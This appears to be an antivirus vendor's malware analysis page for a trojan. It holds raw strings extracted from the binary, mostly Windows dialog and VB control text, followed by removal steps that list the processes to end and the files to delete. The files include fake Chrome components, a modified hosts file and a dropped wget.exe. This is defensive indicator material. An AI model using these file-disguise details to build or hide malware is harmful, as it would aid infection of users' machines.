Couldn't allocate memory for FileName or Filter.WW
Cancel was selected.WW!
Call to Windows Help failed.WW*
The function failed to load a specified string.WWW1
The function failed to lock a specified resource.WH
The function was unable to allocate memory for internal data structures.WWD
The function was unable to lock the memory associated with a handle.WW
No fonts exist.WWW=
File name is invalid.WC
An attempt to subclass a listbox failed due to insufficient memory.WWWB
DevMode and DevNames data structures describe two different printers.WH
The printer-device driver failed to initialize a DEVMODE data structure.WW3
The PrintDlg function failed during initialization.WWWK
The PrintDlg function failed to load the specified printer's device driver.WWW!
No printer device-drivers were found.WB
The Common Dialog function failed to parse the strings in WIN.INI.H
The printer device driver failed to initialize a DevMode data structure.WWK
The [devices] section of WIN.INI does not contain an entry for the printer.WWW:
No template provided by the application.WW/
Application did not provide an instance handle.WWW#
Displays Help for a particular topic.WO
Notifies the Help application that the specified Help file is no longer in use.WWW.
Display Help for using the Help application itself.WWW 
Set the current Index for multi-index Help.WWW2
Displays a topic identified by a context number.WW8
Creates a Help file that displays text in only one font.WW'
Displays Help for a particular keyword.WWW'
Displays Help for a particular command.WWW'
Call the search engine in Windows Help.WWW"
Portrait printer paper orientation#
Sets the string displayed in the title bar of the dialog box.WQ
Returns/sets the default filename extension for the dialog box.WWW(
Returns/sets the initial file directory.WW
Returns/sets the selected color.WW"
Specifies the name of the font that appears in each row for the given level.WW
Returns/sets italic font styles.WW'
Returns/sets strikethrough font styles.WWW#
Returns/sets underline font styles.WWW8
Returns/sets the value for the first page to be printed.WWR
Returns/sets the maximum font size (Font dialog) or print range (Print dialog).WWWH
Returns/sets a value that determines the number of copies to be printed.WWP
Indicates whether an error is generated when the user chooses the Cancel button.WWC
Returns/sets the name of the Help file associated with the project.WWW/
Returns/sets the type of online Help requested.WWWB
Returns/sets the keyword that identifies the requested Help topic.f
Returns/sets a default filter for an Open or Save As dialog box.WW8
Returns/sets the context ID of the requested Help topic.WWX
Specifies the size (in points) of the font that appears in each row for the given level.WW4
Returns/sets the type of dialog box to be displayed.WWT
Returns/sets the maximum size of the filename opened using the CommonDialog control.WWI
Returns a handle (from Microsoft Windows) to the object's device context.WQ
Displays the CommonDialog control's Open dialog box.WW7
Displays the CommonDialog control's Save As dialog box.WWW5
Displays the CommonDialog control's Printer dialog box.WWW8
Runs Winhelp.EXE and displays the Help file you specify.WW&
<!<*<3<><
ComDlg32.dbg
=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0<
'hXXps://VVV.verisign.com/repository/CPS
This certificate incorporates by reference, and its use is strictly
subject to, the VeriSign Certification Practice Statement (CPS)
hXXps://VVV.verisign.com; by E-mail at [email protected]; or
USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN
WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
4hXXps://VVV.verisign.com/repository/verisignlogo.gif0
hXXps://VVV.verisign.com/CPS0b
hXXp://VVV.microsoft.com/vbasic 0
Catalyst.SocketCtrl.1
Catalyst.SocketPropPage.1
NETAPI32.dll
CSWSK32.ocx
LocalPort
RemotePort
PortString
PeerPort
ReservedPort
%d.%d
Unknown control error %d
X:X:X:X:X:X
,%d,%d
WSOCK32.DLL
getservbyport
WSAAsyncGetServByPort
WSATRC32.DLL
TX_getservbyport
TX_WSAAsyncGetServByPort
%d.%d.%d.%d
7LocalPortWWWd
}|RemotePortWWd
/JPortStringWWd
N\PeerPortd
EReservedPortd
CSW25CTL.HLPWW
2-2H2c2}2
=VVV.verisign.com/repository/RPA Incorp. by Ref.,LIAB.LTD(c)981.0,
'hXXps://VVV.verisign.com/repository/RPA0
=VVV.verisign.com/repository/RPA Incorp. by Ref.,LIAB.LTD(c)981>0<
This certificate incorporates by reference, and its use is strictly subject to, the VeriSign Certification Practice Statement (CPS), available at: hXXps://VVV.verisign.com/CPS; by E-mail at [email protected]; or by mail at VeriSign, Inc., 2593 Coast Ave., Mountain View, CA 94043 USA Tel.  1 (415) 961-8830 Copyright (c) 1996 VeriSign, Inc. All Rights Reserved. CERTAIN WARRANTIES DISCLAIMED and LIABILITY LIMITED.
(hXXps://VVV.verisign.com/repository/CPS 0
hXXp://VVV.catalyst.com/0
MSVBVM60.DLL
1E5.TMP
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
DXAnimatedGIF.ocx
STDOLE2.TLBWWW
.idata
@.rsrc
MSVBVM50.DLL
%Program Files%\DevStudio\VB\VB5.OLB
IiC:\WINNT\System32\MSVBVM50.dll\2
FC:\WINNT\System32\StdOle2.tlb
KeyDown
KeyPress
KeyUp
cmdOK
cmdOK_Click
UserControl_KeyDown
UserControl_KeyPress
UserControl_KeyUp
If you found bug, Pleace send an E-Mail to: [email protected], Thanks.
KeyCode
Occurs when the user presses a key while an object has the focus.
KeyAscii
Occurs when the user presses and releases an ANSI key.
Occurs when the user releases a key while an object has the focus.
fhMagicControlsB1.ocx
StdOle2.tlbWWW
.ForeColor1WW
.ForeColor2WW
.aKeyDownW
KeyCodeW
#KeyAsciiX
MKeyUpWWWX
Returns/sets the text displayed in an object's title bar or below an object's icon.WWWQ
Returns/sets the foreground color used to display text and graphics in an object.WW
Returns/sets the number of milliseconds between calls to a Timer control's Timer event.WWW
Occurs when the user presses a key while an object has the focus.W6
Occurs when the user presses and releases an ANSI key.B
Occurs when the user releases a key while an object has the focus.\
Returns/sets a value that determines whether an object can respond to user-generated events.WW
VB6ES.DLL
C:\Archivos de programa\Microsoft Visual Studio\VB98\VB6.OLB
F%System%\stdole2.tlb
Proyecto2.ocx
msvbvm60.dll\3
Returns/sets the background color used to display text and graphics in an object.WQ
Determines the line style for output from graphics methods.WWW
Sets a custom mouse icon.WM
LabelDegradado.ocx
MARCHOSO.MarchosoCtrl.1
MARCHOSO.MarchosoPropPage.1
MFC40.DLL
MARCHOSO.OCX
Error bmi.biHeight
Marchoso.hlpWW
7 7$70747
to1.vbOcxTextVertical
F%System%\STDOLE2.TLB
OcxTextVertical.ocx
ficos en un objeto.WW7
Devuelve o establece el estilo subrayado de una fuente.WWW^
Establece un icono personalizado para el mouse.WWW\
Devuelve o establece el tipo de puntero del mouse mostrado al pasar por encima de un objeto.WW$
Obliga a volver a dibujar un objeto.WWR
s lo vuelve a presionar y liberar sobre un objeto.WWY
Ocurre cuando el usuario mueve el mouse.WWW
n del mouse mientras un objeto tiene el enfoque.WWW
%System%\stdole2.tlb
progressbar-xp.ocx
C:\Programmi\Microsoft Visual Studio\VB98\VB6.OLB
[email protected]
SuperLine.ocx
TRANSPARENT.TransparentPropPage.1
TRANSPARENT.TransparentCtrl.1
TRANSPARENT.OCX
MSVCRT40.dll
trans.hlp
*\G{00020430-0000-0000-C000-000000000046}#1.0#0#C:\WIN95\SYSTEM\stdole32.tlb#
11111111
eee........TTTTTT
.......TTTT
.....TTTT
.....TTT
......KKK
....KKcc
 =)))) -68
))====3%%%*&
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
12, 0, 2, 0
SkinFramework.OCX
Xtreme SkinFramework Control, Version 12.0.2
DB4C0D00-400B-101B-A3C9-08002B2F49FB
4D553650-6ABE-11cf-8ADB-00AA00C00905
28C4C820-401A-101B-A3C9-08002B2F49FB
HelpKey
CmDlg
Help&Key:
CMDialog ActiveX Control DLL
6.00.8169
CMDIALOG
is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation
Printer Dialog Box Constants1Sets or returns state of All Pages option button. Sets or returns state of Collate check box.%Disables the Print to File check box.-The Print to File check box is not displayed.4Sets or returns the state of the Pages option button%Disables the Selection option button.<Prevents a warning message when there is no default printer.5Sets or returns the state of the Pages option button.EDisplays the Print Setup dialog box rather than the Print dialog box.9Sets or returns the state of the Print to File check box.3Returns a device context for the printer selection.
)Couldn't determine procedure address(es).!Failed to show the common dialog.HThe printer device driver failed to initialize a DevMode data structure.
Printer Orientation Constants$Dialog box displays the Help button.!Sets support for multiple copies.
Color Dialog Box Constants,Sets initial color value for the dialog box.KEntire dialog box is displayed, including the Define Custom Colors section.<Disables the Define Custom Colors section of the dialog box."Dialog box displays a Help button.#File Open/Save Dialog Box Constants=Checks Read Only check box for Open and Save As dialog boxes.<Generates a message box if the selected file already exists.
Hides the Read Only check box.JSets the current directory to what it was when the dialog box was invoked.1Causes the dialog box to display the Help button.4Allows invalid characters in the returned file name.:Allows the File Name list box to have multiple selections.LExtension of returned file name is different from the one set by DefaultExt.
%User can enter only valid path names.,User can enter only names of existing files.FAsks if the user wants to create a file that does not currently exist.)Sharing violation errors will be ignored.<The returned file will not have the Read Only attribute set. Windows 95 Open A File dialog box template.
Fonts Dialog Box Constants;Dialog box lists only screen fonts supported by the system.5Dialog box lists only fonts supported by the printer.4Dialog box lists available screen and printer fonts."Dialog box displays a Help button.7Dialog enables strikeout, underline, and color effects.$Dialog box enables the Apply button.@Dialog box allows only fonts that use the Windows character set.QReturns/sets the name (without the path) of the file to open or save at run time.4Displays the CommonDialog control's Open dialog box.7Displays the CommonDialog control's Save As dialog box.5Displays the CommonDialog control's Color dialog box.3Displays the CommonDialog control's Font dialog box7Displays the CommonDialog control's Printer dialog box.8Runs Winhelp.EXE and displays the Help file you specify.
3Dialog box should not allow vector-font selections.LDialog box should not allow graphic device interface (GDI) font simulations.HSelects font sizes within the range specified by Min and Max properties.0Dialog box should select only fixed-pitch fonts.LAllows only the selection of fonts available to both the screen and printer.GDisplays an error if a user selects a font or style that doesn't exist.>Dialog box should allow only the selection of scaleable fonts.>Dialog box should allow only the selection of True Type fonts.
"Portrait printer paper orientation#Landscape printer paper orientation
BThe Common Dialog function failed to parse the strings in WIN.INI.
KThe [devices] section of WIN.INI does not contain an entry for the printer.:The PDReturnDefault flag was set, but a field was nonzero./Application did not provide an instance handle.
Help Constants%Displays Help for a particular topic.ONotifies the Help application that the specified Help file is no longer in use..Displays the index of the specified Help file.5Displays the contents topic in the current Help file.3Display Help for using the Help application itself. Set the current Index for multi-index Help.2Designates a specific topic as the contents topic.0Displays a topic identified by a context number.
8Creates a Help file that displays text in only one font.'Displays Help for a particular keyword.'Displays Help for a particular command.'Call the search engine in Windows Help.6Returns/sets the path and filename of a selected file.=Sets the string displayed in the title bar of the dialog box.QReturns/sets the filters that are displayed in the Type list box of a dialog box.?Returns/sets the default filename extension for the dialog box.(Returns/sets the initial file directory. Returns/sets the selected color."Sets the options for a dialog box.LSpecifies the name of the font that appears in each row for the given level.
Returns/sets bold font styles. Returns/sets italic font styles.'Returns/sets strikethrough font styles.#Returns/sets underline font styles.8Returns/sets the value for the first page to be printed.8Returns/sets the value for the first page to be printed.RSets the smallest allowable font size (Font dialog) or print range (Print dialog).OReturns/sets the maximum font size (Font dialog) or print range (Print dialog).HReturns/sets a value that determines the number of copies to be printed.PIndicates whether an error is generated when the user chooses the Cancel button.CReturns/sets the name of the Help file associated with the project./Returns/sets the type of online Help requested.BReturns/sets the keyword that identifies the requested Help topic.fDetermines if user selections in the Print dialog box are used to change the default printer settings.@Returns/sets a default filter for an Open or Save As dialog box.8Returns/sets the context ID of the requested Help topic.XSpecifies the size (in points) of the font that appears in each row for the given level.4Returns/sets the type of dialog box to be displayed.TReturns/sets the maximum size of the filename opened using the CommonDialog control.IReturns a handle (from Microsoft Windows) to the object's device context.
The ENABLEHOOK flag was set in the Flags member of a common-dialog data structure but the application failed to provide a pointer to a corresponding hook function.RThe common dialog function was unable to lock the memory associated with a handle.VThe common dialog function was unable to allocate memory for internal data structures.?The common dialog function failed to lock a specified resource.?The common dialog function failed to load a specified resource.?The common dialog function failed to find a specified resource.=The common dialog function failed to load a specified string.
The ENABLETEMPLATE flag was set in the Flags member of a common-dialog data structure but the application failed to provide a corresponding template.wThe common dialog function failed during initialization. This error often occurs when insufficient memory is available.TThe lStructSize member of the corresponding common-dialog data structure is invalid.
Call to Windows Help failed.*The function failed during initialization.1The function failed to load a specified resource./The function failed to load a specified string.1The function failed to lock a specified resource.HThe function was unable to allocate memory for internal data structures.DThe function was unable to lock the memory associated with a handle.
BThe PrintDlg function failed when creating an information context.EDevMode and DevNames data structures describe two different printers.HThe printer-device driver failed to initialize a DEVMODE data structure.
]The [devices] section of the file WIN.INI did not contain an entry for the requested printer.PThe PrintDlg function failed when it attempted to create an information context.VThe data in the DEVMODE and DEVNAMES data structures describes two different printers.!A default printer does not exist.%No printer device-drivers were found.3The PrintDlg function failed during initialization.
The printer device-driver failed to initialize a DEVMODE data structure. (This error constant only applies to printer drivers written for Windows 3.0 or later versions.)KThe PrintDlg function failed to load the specified printer's device driver.
The PD_RETURNDEFAULT flag was set in the Flags member of the PRINTDLG data structure but either the hDevMode or hDevNames field were nonzero.dThe common dialog function failed to parse the strings in the [devices] section of the file WIN.INI.
SocketWrench Windows Sockets Control (32-bit)
2.50.2570
CSWSK32.OCX
SocketWrench Windows Sockets Control
,Invalid socket descriptor passed to function
Access denied"Invalid address passed to function
$Socket would block on this operation
Blocking function in progress.Function being cancelled has already completed,Invalid socket descriptor passed to function
Destination address is required1Datagram was too large to fit in specified buffer4Specified protocol is the wrong type for this socket'Socket option is unknown or unsupported#Specified protocol is not supported=Specified socket type is not supported in this address family!Socket operation is not supported*Specified protocol family is not supported:Specified address family is not supported by this protocol
Socket operation timed out$Connection refused by remote network
0Network subsystem is not ready for communication"Requested version is not available'Windows sockets library not initialised
HSocketWrench Windows Sockets Contro
*\AD:\ASM\products\dxanimatedgif\prjAniGif.vbp
tmp.gif
*\A%Program Files%\DevStudio\VB\fhMagicControls\fhMagicControlsB1.vbp
*\AE:\Luciano\CONTEN~1\RECURS~2\DLLOCX~1\OCX-FR~1\OCX-FR~4\Proyecto2.vbp
*\AE:\Luciano\CONTEN~1\RECURS~2\DLLOCX~1\2\OCX-LA~1\Label_TVH.vbp
2, 0, 0, 1
*\AD:\ocx-texto-vertical\Proyecto2.vbp
*\AC:\DOCUME~1\asd\ESCRIT~1\OCX-PR~1\Proyecto2.vbp
*\AC:\ocx\supline\SuperLine.vbp
2\Wliq.vbp
Fabio Guerrazzi, e-mail: [email protected]
1.00.0005
1, 1, 0, 1
3.5.4.26
host.exe
2.0.2.13


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    installer.exe:580
    Chromium.exe:1116
    wget.exe:612
    arsiv.exe:792
    %original file name%.exe:1676

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Application Data\Chromium.exe (11258 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
    %System%\drivers\etc\hosts (269066 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jogoilaonpjembimhekgnboineibhdhf\bg.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\setting (28 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
    %Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
    %Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\bg.txt (3 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\pingjs.js (34 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@joojlee[1].txt (214 bytes)
    %Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
    %Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
    %Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\arsiv.exe (3878606 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
    %Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
